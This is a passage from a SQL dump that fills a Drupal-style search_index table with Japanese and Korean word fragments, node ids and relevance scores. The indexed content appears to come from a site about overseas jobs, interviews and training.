('輸入許', 27, 'ja', 'node_search', 0.343651),
('輸入販', 27, 'ja', 'node_search', 0.318914),
('輸送用', 27, 'ja', 'node_search', 0.325173),
('輸通信', 9, 'ja', 'node_search', 3),
('輸通信', 17, 'ja', 'node_search', 4),
('辞めて', 3, 'ja', 'node_search', 0.618696),
('農作物', 163, 'ja', 'node_search', 0.916736),
('農業経', 163, 'ja', 'node_search', 2.71211),
('農業関', 24, 'ja', 'node_search', 0.58995),
('辺都市', 24, 'ja', 'node_search', 0.358606),
('込みの', 29, 'ja', 'node_search', 3),
('込んで', 24, 'ja', 'node_search', 0.738408),
('迅速に', 6, 'ja', 'node_search', 3),
('迎えら', 9, 'ja', 'node_search', 3),
('迎えら', 17, 'ja', 'node_search', 4),
('迎えら', 184, 'ja', 'node_search', 1),
('迎える', 120, 'ja', 'node_search', 1),
('送られ', 175, 'ja', 'node_search', 0.873132),
('送られ', 177, 'ja', 'node_search', 0.794753),
('送られ', 184, 'ja', 'node_search', 0.797402),
('送りま', 69, 'ja', 'node_search', 0.938382),
('送用各', 27, 'ja', 'node_search', 0.324748),
('逃しな', 62, 'ja', 'node_search', 0.514686),
('通して', 120, 'ja', 'node_search', 1),
('通して', 135, 'ja', 'node_search', 0.923838),
('通じて', 27, 'ja', 'node_search', 0.45501),
('通じて', 138, 'ja', 'node_search', 1),
('通じて', 142, 'ja', 'node_search', 1.67243),
('通じて', 156, 'ja', 'node_search', 1.94583),
('通じて', 157, 'ja', 'node_search', 1.83645),
('通じて', 181, 'ja', 'node_search', 1),
('通じて', 189, 'ja', 'node_search', 0.953396),
('通じて', 193, 'ja', 'node_search', 0.989021),
('通りで', 27, 'ja', 'node_search', 1.18305),
('通りで', 157, 'ja', 'node_search', 1),
('通信省', 9, 'ja', 'node_search', 3),
('通信省', 17, 'ja', 'node_search', 4),
('通常の', 5, 'ja', 'node_search', 1),
('通手段', 5, 'ja', 'node_search', 0.866793),
('通機関', 23, 'ja', 'node_search', 0.920273),
('通総局', 27, 'ja', 'node_search', 0.742984),
('通費を', 18, 'ja', 'node_search', 1),
('通院時', 162, 'ja', 'node_search', 0.742984),
('速に来', 6, 'ja', 'node_search', 3),
('造職の', 115, 'ja', 'node_search', 1),
('造船所', 6, 'ja', 'node_search', 28),
('造船所', 8, 'ja', 'node_search', 27),
('造船所', 9, 'ja', 'node_search', 3),
('造船所', 10, 'ja', 'node_search', 28),
('造船所', 17, 'ja', 'node_search', 4),
('造船所', 23, 'ja', 'node_search', 0.60778),
('造船所', 24, 'ja', 'node_search', 1),
('連する', 3, 'ja', 'node_search', 0.808176),
('連する', 10, 'ja', 'node_search', 1),
('連する', 24, 'ja', 'node_search', 0.373825),
('連合領', 27, 'ja', 'node_search', 0.945829),
('連携も', 24, 'ja', 'node_search', 0.3427),
('連経験', 138, 'ja', 'node_search', 0.927431),
('進する', 27, 'ja', 'node_search', 0.313688),
('進する', 136, 'ja', 'node_search', 0.657549),
('進とな', 168, 'ja', 'node_search', 1),
('進とな', 170, 'ja', 'node_search', 1),
('進とな', 180, 'ja', 'node_search', 1),
('進とな', 196, 'ja', 'node_search', 1),
('進とな', 198, 'ja', 'node_search', 1),
('進とな', 199, 'ja', 'node_search', 1),
('進まれ', 185, 'ja', 'node_search', 0.997306),
('進めて', 142, 'ja', 'node_search', 1),
('進学や', 181, 'ja', 'node_search', 0.945829),
('進学や', 182, 'ja', 'node_search', 0.980874),
('進学や', 183, 'ja', 'node_search', 0.980874),
('進歩と', 140, 'ja', 'node_search', 0.800068),
('遅滞な', 133, 'ja', 'node_search', 0.725015),
('遇いた', 162, 'ja', 'node_search', 0.641769),
('遇いた', 163, 'ja', 'node_search', 0.662985),
('遇する', 136, 'ja', 'node_search', 0.906287),
('遇する', 138, 'ja', 'node_search', 0.705825),
('運営し', 25, 'ja', 'node_search', 1),
('運営を', 23, 'ja', 'node_search', 1),
('運転免', 163, 'ja', 'node_search', 0.685676),
('運輸通', 9, 'ja', 'node_search', 3),
('運輸通', 17, 'ja', 'node_search', 4),
('過去に', 3, 'ja', 'node_search', 0.645209),
('道へ出', 68, 'ja', 'node_search', 1),
('道へ出', 78, 'ja', 'node_search', 1),
('道徳心', 87, 'ja', 'node_search', 1),
('道路交', 27, 'ja', 'node_search', 0.749958),
('達と記', 20, 'ja', 'node_search', 31),
('達には', 24, 'ja', 'node_search', 2.13408),
('達のた', 24, 'ja', 'node_search', 0.562486),
('達の元', 24, 'ja', 'node_search', 1),
('達の訓', 26, 'ja', 'node_search', 1),
('達を生', 25, 'ja', 'node_search', 1),
('達を生', 26, 'ja', 'node_search', 1),
('達成さ', 181, 'ja', 'node_search', 1),
('達成さ', 182, 'ja', 'node_search', 1),
('達成さ', 183, 'ja', 'node_search', 1),
('達成さ', 190, 'ja', 'node_search', 1),
('達成に', 62, 'ja', 'node_search', 0.484898),
('達成の', 1, 'ja', 'node_search', 0.997306),
('適切な', 133, 'ja', 'node_search', 1),
('遭遇す', 136, 'ja', 'node_search', 0.909743),
('遭遇す', 138, 'ja', 'node_search', 0.707906),
('選ばれ', 25, 'ja', 'node_search', 1),
('選ぶに', 87, 'ja', 'node_search', 1),
('選外食', 81, 'ja', 'node_search', 4),
('選外食', 134, 'ja', 'node_search', 1),
('避ける', 142, 'ja', 'node_search', 1),
('郡区の', 27, 'ja', 'node_search', 0.361759),
('部であ', 23, 'ja', 'node_search', 1.75707),
('部とし', 24, 'ja', 'node_search', 0.747619),
('部は以', 27, 'ja', 'node_search', 0.822065),
('部への', 27, 'ja', 'node_search', 0.442633),
('部長を', 27, 'ja', 'node_search', 0.392932),
('部門で', 27, 'ja', 'node_search', 0.384933),
('部門で', 135, 'ja', 'node_search', 0.769219),
('部門の', 27, 'ja', 'node_search', 0.474499),
('都市で', 24, 'ja', 'node_search', 0.358086),
('配する', 98, 'ja', 'node_search', 1),
('配を促', 136, 'ja', 'node_search', 0.662985),
('重なア', 120, 'ja', 'node_search', 1),
('重な支', 62, 'ja', 'node_search', 0.699655),
('重な職', 136, 'ja', 'node_search', 0.766757),
('重に徹', 87, 'ja', 'node_search', 0.716357),
('重ねが', 191, 'ja', 'node_search', 1),
('重ねた', 24, 'ja', 'node_search', 1),
('重ねた', 182, 'ja', 'node_search', 1),
('重ねた', 183, 'ja', 'node_search', 1),
('重ねて', 165, 'ja', 'node_search', 0.976851),
('重ねて', 184, 'ja', 'node_search', 0.980874),
('重ねに', 179, 'ja', 'node_search', 0.989021),
('重ねに', 190, 'ja', 'node_search', 1),
('重ねに', 199, 'ja', 'node_search', 0.961087),
('重ねら', 169, 'ja', 'node_search', 0.906287),
('重を基', 25, 'ja', 'node_search', 1),
('重要で', 3, 'ja', 'node_search', 1.39179),
('重要で', 140, 'ja', 'node_search', 0.830633),
('重要で', 188, 'ja', 'node_search', 0.961087),
('重要な', 180, 'ja', 'node_search', 0.957226),
('重要な', 181, 'ja', 'node_search', 0.98493),
('重要な', 183, 'ja', 'node_search', 0.906287),
('重要な', 196, 'ja', 'node_search', 0.96498),
('重要性', 122, 'ja', 'node_search', 2),
('野での', 10, 'ja', 'node_search', 2),
('野での', 178, 'ja', 'node_search', 0.830633),
('野では', 187, 'ja', 'node_search', 0.938382),
('野で働', 3, 'ja', 'node_search', 0.652202),
('野で働', 7, 'ja', 'node_search', 1.8861),
('野で働', 170, 'ja', 'node_search', 1),
('野で新', 169, 'ja', 'node_search', 1),
('野で新', 171, 'ja', 'node_search', 1),
('野で活', 188, 'ja', 'node_search', 1),
('野で活', 189, 'ja', 'node_search', 1),
('野にお', 165, 'ja', 'node_search', 1),
('野のキ', 178, 'ja', 'node_search', 1),
('野の特', 155, 'ja', 'node_search', 0.848323),
('野の管', 7, 'ja', 'node_search', 1.8861),
('野特定', 155, 'ja', 'node_search', 1),
('野菜や', 133, 'ja', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('金の機', 62, 'ja', 'node_search', 0.522445),
('金を除', 62, 'ja', 'node_search', 1.16743),
('金曜日', 142, 'ja', 'node_search', 1),
('金額や', 8, 'ja', 'node_search', 2),
('銀行ロ', 3, 'ja', 'node_search', 0.993146),
('録して', 28, 'ja', 'node_search', 3),
('録にや', 19, 'ja', 'node_search', 1),
('録に来', 19, 'ja', 'node_search', 2),
('録保持', 30, 'ja', 'node_search', 1.84234),
('録番号', 27, 'ja', 'node_search', 1.89173),
('長が期', 198, 'ja', 'node_search', 0.913226),
('長され', 173, 'ja', 'node_search', 0.866793),
('長され', 175, 'ja', 'node_search', 0.899454),
('長され', 176, 'ja', 'node_search', 0.927431),
('長され', 177, 'ja', 'node_search', 0.816452),
('長され', 184, 'ja', 'node_search', 0.827757),
('長され', 197, 'ja', 'node_search', 0.839384),
('長し活', 195, 'ja', 'node_search', 0.993146),
('長とご', 181, 'ja', 'node_search', 0.827757),
('長と成', 169, 'ja', 'node_search', 0.923838),
('長と挑', 174, 'ja', 'node_search', 0.968904),
('長と活', 199, 'ja', 'node_search', 0.889397),
('長と経', 192, 'ja', 'node_search', 0.906287),
('長につ', 164, 'ja', 'node_search', 0.848323),
('長につ', 193, 'ja', 'node_search', 0.923838),
('長の機', 185, 'ja', 'node_search', 0.931053),
('長の機', 187, 'ja', 'node_search', 0.909743),
('長の機', 194, 'ja', 'node_search', 0.830633),
('長の言', 62, 'ja', 'node_search', 0.537506),
('長をお', 171, 'ja', 'node_search', 0.802752),
('長を提', 27, 'ja', 'node_search', 0.392305),
('長崎へ', 76, 'ja', 'node_search', 4),
('長期に', 150, 'ja', 'node_search', 1),
('長期的', 162, 'ja', 'node_search', 1.68961),
('長期的', 163, 'ja', 'node_search', 1),
('長期間', 165, 'ja', 'node_search', 1),
('門での', 135, 'ja', 'node_search', 0.766757),
('門で住', 27, 'ja', 'node_search', 0.384332),
('門の両', 27, 'ja', 'node_search', 0.473576),
('門コン', 27, 'ja', 'node_search', 0.618696),
('門人材', 170, 'ja', 'node_search', 0.842342),
('門作業', 27, 'ja', 'node_search', 0.60778),
('門学位', 30, 'ja', 'node_search', 0.854391),
('門家に', 7, 'ja', 'node_search', 1.8861),
('門知識', 27, 'ja', 'node_search', 0.435532),
('門知識', 62, 'ja', 'node_search', 1),
('開いて', 24, 'ja', 'node_search', 0.931053),
('開いて', 62, 'ja', 'node_search', 0.494765),
('開かれ', 187, 'ja', 'node_search', 0.961087),
('開けま', 62, 'ja', 'node_search', 0.47729),
('開始い', 27, 'ja', 'node_search', 0.317287),
('開始し', 23, 'ja', 'node_search', 1),
('開始し', 27, 'ja', 'node_search', 1),
('開始し', 28, 'ja', 'node_search', 3),
('開始日', 62, 'ja', 'node_search', 1.20216),
('開発大', 27, 'ja', 'node_search', 0.786915),
('開設し', 24, 'ja', 'node_search', 0.450806),
('開講い', 155, 'ja', 'node_search', 1),
('開講の', 155, 'ja', 'node_search', 2),
('開講日', 155, 'ja', 'node_search', 0.927431),
('間およ', 27, 'ja', 'node_search', 0.38797),
('間にわ', 165, 'ja', 'node_search', 1),
('間に投', 3, 'ja', 'node_search', 1),
('間に損', 26, 'ja', 'node_search', 1),
('間の専', 62, 'ja', 'node_search', 1),
('間の建', 27, 'ja', 'node_search', 0.668514),
('間の残', 8, 'ja', 'node_search', 2),
('間をか', 24, 'ja', 'node_search', 0.514686),
('間を厳', 77, 'ja', 'node_search', 4),
('間を厳', 87, 'ja', 'node_search', 1),
('間を通', 27, 'ja', 'node_search', 0.456713),
('間住宅', 27, 'ja', 'node_search', 0.356535),
('間内に', 3, 'ja', 'node_search', 0.587082),
('間続け', 23, 'ja', 'node_search', 0.824901),
('間部門', 27, 'ja', 'node_search', 0.475426),
('関およ', 27, 'ja', 'node_search', 0.677939),
('関する', 24, 'ja', 'node_search', 0.672252),
('関する', 150, 'ja', 'node_search', 19),
('関とし', 23, 'ja', 'node_search', 0.913226),
('関を通', 156, 'ja', 'node_search', 0.949597),
('関を通', 157, 'ja', 'node_search', 0.839384),
('関係の', 24, 'ja', 'node_search', 0.587082),
('関係を', 25, 'ja', 'node_search', 1),
('関連す', 3, 'ja', 'node_search', 0.810915),
('関連す', 10, 'ja', 'node_search', 1),
('関連す', 24, 'ja', 'node_search', 0.374394),
('関連経', 138, 'ja', 'node_search', 0.931053),
('降に残', 5, 'ja', 'node_search', 1),
('限に活', 116, 'ja', 'node_search', 1),
('限り手', 27, 'ja', 'node_search', 0.521322),
('限定で', 163, 'ja', 'node_search', 0.646943),
('院時の', 162, 'ja', 'node_search', 0.740689),
('除しま', 136, 'ja', 'node_search', 0.693594),
('階建て', 27, 'ja', 'node_search', 1.46845),
('際の職', 155, 'ja', 'node_search', 1),
('際の適', 133, 'ja', 'node_search', 1),
('際スタ', 25, 'ja', 'node_search', 1),
('際スタ', 26, 'ja', 'node_search', 1),
('際使え', 24, 'ja', 'node_search', 1),
('際的な', 194, 'ja', 'node_search', 1),
('集して', 5, 'ja', 'node_search', 0.784336),
('集して', 8, 'ja', 'node_search', 2),
('集して', 10, 'ja', 'node_search', 3),
('集して', 135, 'ja', 'node_search', 0.731649),
('集して', 163, 'ja', 'node_search', 1),
('集のお', 163, 'ja', 'node_search', 4),
('集人数', 163, 'ja', 'node_search', 0.653974),
('雇用さ', 6, 'ja', 'node_search', 28),
('雇用す', 23, 'ja', 'node_search', 0.779231),
('雑な建', 27, 'ja', 'node_search', 0.453319),
('雑な漢', 62, 'ja', 'node_search', 0.813674),
('難に遭', 136, 'ja', 'node_search', 0.916736),
('電力工', 10, 'ja', 'node_search', 1),
('電子工', 10, 'ja', 'node_search', 1),
('電気エ', 10, 'ja', 'node_search', 29),
('需要が', 155, 'ja', 'node_search', 0.808176),
('青少年', 27, 'ja', 'node_search', 0.800068),
('非常に', 140, 'ja', 'node_search', 0.839384),
('面だけ', 122, 'ja', 'node_search', 1),
('面でご', 177, 'ja', 'node_search', 0.745294),
('面接に', 70, 'ja', 'node_search', 1),
('面接に', 71, 'ja', 'node_search', 1),
('面接に', 72, 'ja', 'node_search', 1),
('面接に', 74, 'ja', 'node_search', 1),
('面接に', 75, 'ja', 'node_search', 1),
('面接に', 81, 'ja', 'node_search', 4),
('面接に', 82, 'ja', 'node_search', 1),
('面接に', 84, 'ja', 'node_search', 1),
('面接に', 90, 'ja', 'node_search', 1),
('面接に', 98, 'ja', 'node_search', 1),
('面接に', 100, 'ja', 'node_search', 4),
('面接に', 107, 'ja', 'node_search', 1),
('面接に', 109, 'ja', 'node_search', 1),
('面接に', 112, 'ja', 'node_search', 1),
('面接に', 114, 'ja', 'node_search', 1),
('面接に', 115, 'ja', 'node_search', 1),
('面接に', 117, 'ja', 'node_search', 1),
('面接に', 131, 'ja', 'node_search', 1),
('面接に', 132, 'ja', 'node_search', 1),
('面接に', 133, 'ja', 'node_search', 0.784336),
('面接に', 134, 'ja', 'node_search', 1),
('面接に', 135, 'ja', 'node_search', 1),
('面接に', 136, 'ja', 'node_search', 2),
('面接に', 137, 'ja', 'node_search', 1),
('面接に', 139, 'ja', 'node_search', 1),
('面接に', 140, 'ja', 'node_search', 1),
('面接に', 141, 'ja', 'node_search', 1),
('面接に', 143, 'ja', 'node_search', 1),
('面接に', 144, 'ja', 'node_search', 1),
('面接に', 160, 'ja', 'node_search', 3.99047),
('面接に', 161, 'ja', 'node_search', 1.74996),
('面接に', 166, 'ja', 'node_search', 4.08679),
('面接に', 168, 'ja', 'node_search', 1.75946),
('面接に', 170, 'ja', 'node_search', 3.98118),
('面接に', 178, 'ja', 'node_search', 1.78178),
('面接に', 179, 'ja', 'node_search', 2.73165),
('面接に', 180, 'ja', 'node_search', 1.80007),
('面接に', 185, 'ja', 'node_search', 4.00925),
('面接に', 186, 'ja', 'node_search', 1.76922),
('面接に', 187, 'ja', 'node_search', 3.96276),
('面接に', 188, 'ja', 'node_search', 1.76188),
('面接に', 189, 'ja', 'node_search', 3.99983),
('面接に', 190, 'ja', 'node_search', 4.07688),
('面接に', 191, 'ja', 'node_search', 4.2327),
('面接に', 192, 'ja', 'node_search', 4.11692),
('面接に', 193, 'ja', 'node_search', 4.17901),
('面接に', 194, 'ja', 'node_search', 4.00925),
('面接に', 195, 'ja', 'node_search', 1.80545),
('面接に', 196, 'ja', 'node_search', 4.18961),
('面接に', 197, 'ja', 'node_search', 4.07688),
('面接に', 198, 'ja', 'node_search', 1.78178),
('面接に', 199, 'ja', 'node_search', 4.01872),
('面接の', 138, 'ja', 'node_search', 1),
('面接を', 142, 'ja', 'node_search', 0.822065),
('面接を', 189, 'ja', 'node_search', 0.96498),
('面接合', 85, 'ja', 'node_search', 4),
('面接合', 101, 'ja', 'node_search', 4),
('面接合', 102, 'ja', 'node_search', 1),
('面接合', 110, 'ja', 'node_search', 1),
('面接合', 120, 'ja', 'node_search', 19),
('面接合', 138, 'ja', 'node_search', 0.718502),
('面接合', 146, 'ja', 'node_search', 20),
('面接合', 160, 'ja', 'node_search', 27),
('面接合', 161, 'ja', 'node_search', 31),
('面接合', 166, 'ja', 'node_search', 31),
('面接合', 168, 'ja', 'node_search', 31),
('面接合', 170, 'ja', 'node_search', 31),
('面接合', 178, 'ja', 'node_search', 31),
('面接合', 179, 'ja', 'node_search', 31),
('面接合', 180, 'ja', 'node_search', 32),
('面接合', 185, 'ja', 'node_search', 31),
('面接合', 186, 'ja', 'node_search', 32),
('面接合', 187, 'ja', 'node_search', 31),
('面接合', 188, 'ja', 'node_search', 31),
('面接合', 189, 'ja', 'node_search', 31),
('面接合', 190, 'ja', 'node_search', 32),
('面接合', 191, 'ja', 'node_search', 32),
('面接合', 192, 'ja', 'node_search', 32),
('面接合', 193, 'ja', 'node_search', 31),
('面接合', 194, 'ja', 'node_search', 31),
('面接合', 195, 'ja', 'node_search', 31),
('面接合', 196, 'ja', 'node_search', 32),
('面接合', 197, 'ja', 'node_search', 31),
('面接合', 198, 'ja', 'node_search', 31),
('面接合', 199, 'ja', 'node_search', 31),
('面接合', 200, 'ja', 'node_search', 31),
('面接対', 155, 'ja', 'node_search', 1),
('面接対', 184, 'ja', 'node_search', 1),
('面接成', 197, 'ja', 'node_search', 1),
('面接準', 173, 'ja', 'node_search', 1),
('韓国が', 3, 'ja', 'node_search', 0.557303),
('韓国で', 3, 'ja', 'node_search', 1),
('韓国な', 23, 'ja', 'node_search', 0.526987),
('韓国な', 24, 'ja', 'node_search', 0.569105),
('韓国に', 3, 'ja', 'node_search', 2.76188),
('韓国に', 19, 'ja', 'node_search', 3),
('韓国の', 3, 'ja', 'node_search', 0.827757),
('韓国の', 6, 'ja', 'node_search', 28),
('韓国の', 8, 'ja', 'node_search', 27),
('韓国の', 10, 'ja', 'node_search', 28),
('韓国の', 23, 'ja', 'node_search', 0.61241),
('韓国の', 24, 'ja', 'node_search', 1),
('韓国側', 29, 'ja', 'node_search', 28),
('韓国語', 3, 'ja', 'node_search', 0.525844),
('韓国語', 24, 'ja', 'node_search', 1.32324),
('韓国語', 28, 'ja', 'node_search', 28),
('頃な価', 27, 'ja', 'node_search', 0.995416),
('項です', 98, 'ja', 'node_search', 0.989021),
('順を丁', 133, 'ja', 'node_search', 1),
('順調に', 154, 'ja', 'node_search', 0.96498),
('順調に', 178, 'ja', 'node_search', 0.934703),
('順調に', 187, 'ja', 'node_search', 0.851346),
('順調に', 190, 'ja', 'node_search', 0.892724),
('順調に', 194, 'ja', 'node_search', 0.869951),
('須のス', 140, 'ja', 'node_search', 0.916736),
('須の知', 142, 'ja', 'node_search', 0.716357),
('頑張っ', 69, 'ja', 'node_search', 1),
('領土を', 27, 'ja', 'node_search', 0.938382),
('頼して', 69, 'ja', 'node_search', 1),
('頼して', 135, 'ja', 'node_search', 0.674137),
('頼でき', 27, 'ja', 'node_search', 0.496787),
('頼とと', 69, 'ja', 'node_search', 0.98493),
('題あり', 3, 'ja', 'node_search', 1),
('題です', 3, 'ja', 'node_search', 1),
('題など', 62, 'ja', 'node_search', 0.542319),
('題の単', 142, 'ja', 'node_search', 1),
('題を排', 136, 'ja', 'node_search', 0.699655),
('題を軽', 138, 'ja', 'node_search', 0.677939),
('額や生', 8, 'ja', 'node_search', 2),
('願って', 154, 'ja', 'node_search', 0.863659),
('願って', 161, 'ja', 'node_search', 0.759465),
('願って', 164, 'ja', 'node_search', 0.827757),
('願って', 165, 'ja', 'node_search', 0.816452),
('願って', 166, 'ja', 'node_search', 0.805455),
('願って', 167, 'ja', 'node_search', 0.899454),
('願って', 168, 'ja', 'node_search', 0.792123),
('願って', 169, 'ja', 'node_search', 0.873132),
('願って', 170, 'ja', 'node_search', 0.776703),
('願って', 171, 'ja', 'node_search', 0.851346),
('願って', 173, 'ja', 'node_search', 0.839384),
('願って', 174, 'ja', 'node_search', 0.784336),
('願って', 175, 'ja', 'node_search', 0.845322),
('願って', 176, 'ja', 'node_search', 0.896076),
('願って', 177, 'ja', 'node_search', 0.776703),
('願って', 178, 'ja', 'node_search', 0.848323),
('願って', 184, 'ja', 'node_search', 0.774192),
('願って', 185, 'ja', 'node_search', 0.76188),
('願って', 187, 'ja', 'node_search', 0.776703),
('願って', 189, 'ja', 'node_search', 0.76188),
('願って', 190, 'ja', 'node_search', 0.810915),
('願って', 194, 'ja', 'node_search', 0.792123),
('願って', 199, 'ja', 'node_search', 0.766757),
('類なき', 62, 'ja', 'node_search', 0.879565),
('類関係', 24, 'ja', 'node_search', 0.591395),
('食を取', 122, 'ja', 'node_search', 1),
('食ビザ', 111, 'ja', 'node_search', 1),
('食事の', 162, 'ja', 'node_search', 0.792123),
('食事は', 5, 'ja', 'node_search', 1),
('食事を', 133, 'ja', 'node_search', 1),
('食合格', 124, 'ja', 'node_search', 1),
('食品サ', 68, 'ja', 'node_search', 1),
('食品製', 115, 'ja', 'node_search', 1),
('食品関', 24, 'ja', 'node_search', 0.604732),
('食実習', 133, 'ja', 'node_search', 1),
('食店の', 101, 'ja', 'node_search', 4),
('食店の', 102, 'ja', 'node_search', 1),
('食材の', 122, 'ja', 'node_search', 1),
('食業分', 185, 'ja', 'node_search', 0.968904),
('食業分', 187, 'ja', 'node_search', 0.949597),
('食業界', 18, 'ja', 'node_search', 1),
('食業界', 161, 'ja', 'node_search', 1),
('食業界', 167, 'ja', 'node_search', 1),
('食業界', 173, 'ja', 'node_search', 0.993146),
('食業界', 174, 'ja', 'node_search', 1),
('食業界', 175, 'ja', 'node_search', 1),
('食業界', 176, 'ja', 'node_search', 1),
('食業界', 177, 'ja', 'node_search', 1),
('食業界', 187, 'ja', 'node_search', 1),
('食業界', 190, 'ja', 'node_search', 1),
('食業界', 192, 'ja', 'node_search', 1),
('食業界', 193, 'ja', 'node_search', 1),
('食業界', 194, 'ja', 'node_search', 1),
('食業界', 195, 'ja', 'node_search', 1),
('食業界', 198, 'ja', 'node_search', 1),
('食面接', 85, 'ja', 'node_search', 4),
('飲食店', 101, 'ja', 'node_search', 4),
('飲食店', 102, 'ja', 'node_search', 1),
('飲食業', 18, 'ja', 'node_search', 1),
('験があ', 18, 'ja', 'node_search', 1),
('験があ', 163, 'ja', 'node_search', 1),
('験が必', 30, 'ja', 'node_search', 3.68468),
('験と成', 164, 'ja', 'node_search', 0.857458),
('験と成', 185, 'ja', 'node_search', 0.942091),
('験と成', 194, 'ja', 'node_search', 0.839384),
('験につ', 192, 'ja', 'node_search', 0.896076),
('験に合', 181, 'ja', 'node_search', 0.784336),
('験に合', 182, 'ja', 'node_search', 0.794753),
('験に合', 183, 'ja', 'node_search', 0.733888),
('験に向', 142, 'ja', 'node_search', 1),
('験に恵', 174, 'ja', 'node_search', 0.813674),
('験の合', 155, 'ja', 'node_search', 0.754681),
('験も身', 138, 'ja', 'node_search', 0.920273),
('験やス', 198, 'ja', 'node_search', 0.968904),
('験や成', 187, 'ja', 'node_search', 0.920273),
('験を受', 3, 'ja', 'node_search', 0.854391),
('験を受', 6, 'ja', 'node_search', 3),
('験を持', 7, 'ja', 'node_search', 1.80637),
('験を持', 133, 'ja', 'node_search', 1),
('験を提', 62, 'ja', 'node_search', 0.997306),
('験を提', 135, 'ja', 'node_search', 0.693594),
('験を活', 163, 'ja', 'node_search', 1),
('験を積', 95, 'ja', 'node_search', 19),
('験を積', 98, 'ja', 'node_search', 1),
('験を積', 116, 'ja', 'node_search', 1),
('験を積', 136, 'ja', 'node_search', 1.60239),
('験を積', 167, 'ja', 'node_search', 0.989021),
('験を積', 169, 'ja', 'node_search', 0.934703),
('験を積', 173, 'ja', 'node_search', 0.916736),
('験を積', 175, 'ja', 'node_search', 0.927431),
('験を積', 176, 'ja', 'node_search', 0.957226),
('験を積', 177, 'ja', 'node_search', 0.839384),
('験を積', 184, 'ja', 'node_search', 0.851346),
('験を積', 190, 'ja', 'node_search', 0.860547),
('験を積', 194, 'ja', 'node_search', 1),
('験を積', 197, 'ja', 'node_search', 0.863659),
('験を通', 193, 'ja', 'node_search', 0.997306),
('験対策', 155, 'ja', 'node_search', 29),
('験登録', 19, 'ja', 'node_search', 3),
('験者は', 162, 'ja', 'node_search', 0.648686),
('験者歓', 163, 'ja', 'node_search', 0.71),
('験豊か', 116, 'ja', 'node_search', 1),
('験豊富', 7, 'ja', 'node_search', 3.71013),
('験豊富', 8, 'ja', 'node_search', 2),
('験豊富', 10, 'ja', 'node_search', 3),
('験豊富', 18, 'ja', 'node_search', 1),
('験豊富', 23, 'ja', 'node_search', 1.01219),
('験豊富', 24, 'ja', 'node_search', 1),
('験豊富', 135, 'ja', 'node_search', 1),
('験豊富', 136, 'ja', 'node_search', 1),
('験豊富', 138, 'ja', 'node_search', 1),
('高い生', 25, 'ja', 'node_search', 1),
('高い生', 26, 'ja', 'node_search', 1),
('高い研', 23, 'ja', 'node_search', 0.431687),
('高い需', 155, 'ja', 'node_search', 0.813674),
('高く評', 162, 'ja', 'node_search', 0.863659),
('高等学', 27, 'ja', 'node_search', 0.358606),
('高齢者', 136, 'ja', 'node_search', 0.797402),
('高齢者', 188, 'ja', 'node_search', 1),
('魅力的', 185, 'ja', 'node_search', 0.899454),
('鮮な旬', 122, 'ja', 'node_search', 1),
('黄金の', 62, 'ja', 'node_search', 0.523573),
('齢者の', 188, 'ja', 'node_search', 1),
('齢者介', 136, 'ja', 'node_search', 0.794753),
('가고자', 24, 'ko', 'node_search', 0.725015),
('가라떵', 11, 'ko', 'node_search', 1),
('가르치', 28, 'ko', 'node_search', 1),
('가르칩', 24, 'ko', 'node_search', 0.766757),
('가에서', 23, 'ko', 'node_search', 0.805455),
('가에서', 24, 'ko', 'node_search', 0.931053),
('가포르', 23, 'ko', 'node_search', 0.813674),
('가포르', 24, 'ko', 'node_search', 0.938382),
('가포르', 30, 'ko', 'node_search', 28),
('각지에', 23, 'ko', 'node_search', 0.938382),
('간호지', 24, 'ko', 'node_search', 1),
('감사드', 1, 'ko', 'node_search', 1),
('강하려', 24, 'ko', 'node_search', 0.699655),
('개발한', 23, 'ko', 'node_search', 0.769219),
('개설하', 24, 'ko', 'node_search', 0.808176),
('개설했', 28, 'ko', 'node_search', 3),
('개하고', 1, 'ko', 'node_search', 1),
('개회사', 23, 'ko', 'node_search', 3.67319),
('객들이', 25, 'ko', 'node_search', 4),
('것입니', 25, 'ko', 'node_search', 1),
('게다가', 23, 'ko', 'node_search', 1),
('격시험', 23, 'ko', 'node_search', 0.736141),
('격하는', 24, 'ko', 'node_search', 1),
('견하는', 23, 'ko', 'node_search', 0.691597),
('결과를', 29, 'ko', 'node_search', 3),
('결하고', 24, 'ko', 'node_search', 0.879565),
('경우에', 24, 'ko', 'node_search', 0.899454),
('경제통', 23, 'ko', 'node_search', 1),
('경험에', 30, 'ko', 'node_search', 2),
('경험이', 30, 'ko', 'node_search', 2),
('계공학', 30, 'ko', 'node_search', 1),
('계하고', 24, 'ko', 'node_search', 0.685676),
('계하여', 24, 'ko', 'node_search', 0.712106),
('고객들', 25, 'ko', 'node_search', 4),
('고용업', 23, 'ko', 'node_search', 1),
('고용주', 26, 'ko', 'node_search', 1),
('공정한', 24, 'ko', 'node_search', 0.839384),
('공하고', 23, 'ko', 'node_search', 2.3878),
('공하기', 23, 'ko', 'node_search', 0.689612),
('공하는', 1, 'ko', 'node_search', 1),
('공하는', 24, 'ko', 'node_search', 0.873132),
('공함해', 24, 'ko', 'node_search', 1),
('공합니', 24, 'ko', 'node_search', 2.36245),
('공했습', 23, 'ko', 'node_search', 1.96109),
('과적인', 28, 'ko', 'node_search', 1),
('과정과', 24, 'ko', 'node_search', 0.909743),
('과정들', 24, 'ko', 'node_search', 0.889397),
('관계를', 25, 'ko', 'node_search', 4),
('관심있', 28, 'ko', 'node_search', 3),
('관행의', 24, 'ko', 'node_search', 0.836446),
('교육과', 24, 'ko', 'node_search', 0.892724),
('교육센', 24, 'ko', 'node_search', 0.72066),
('교육시', 24, 'ko', 'node_search', 1),
('교육을', 23, 'ko', 'node_search', 1.47557),
('교육을', 24, 'ko', 'node_search', 1.7974),
('교통통', 23, 'ko', 'node_search', 0.916736),
('교통통', 24, 'ko', 'node_search', 1),
('구사할', 30, 'ko', 'node_search', 2),
('구축하', 25, 'ko', 'node_search', 4),
('국가에', 23, 'ko', 'node_search', 0.808176),
('국가에', 24, 'ko', 'node_search', 0.934703),
('국에서', 24, 'ko', 'node_search', 1),
('국에서', 26, 'ko', 'node_search', 1),
('국인고', 23, 'ko', 'node_search', 1),
('국제이', 26, 'ko', 'node_search', 1),
('국제채', 26, 'ko', 'node_search', 1),
('굴하는', 25, 'ko', 'node_search', 1),
('그리고', 23, 'ko', 'node_search', 0.810915),
('근로자', 26, 'ko', 'node_search', 2),
('금들을', 23, 'ko', 'node_search', 1),
('급하게', 30, 'ko', 'node_search', 28),
('기계공', 30, 'ko', 'node_search', 1),
('기계를', 23, 'ko', 'node_search', 1),
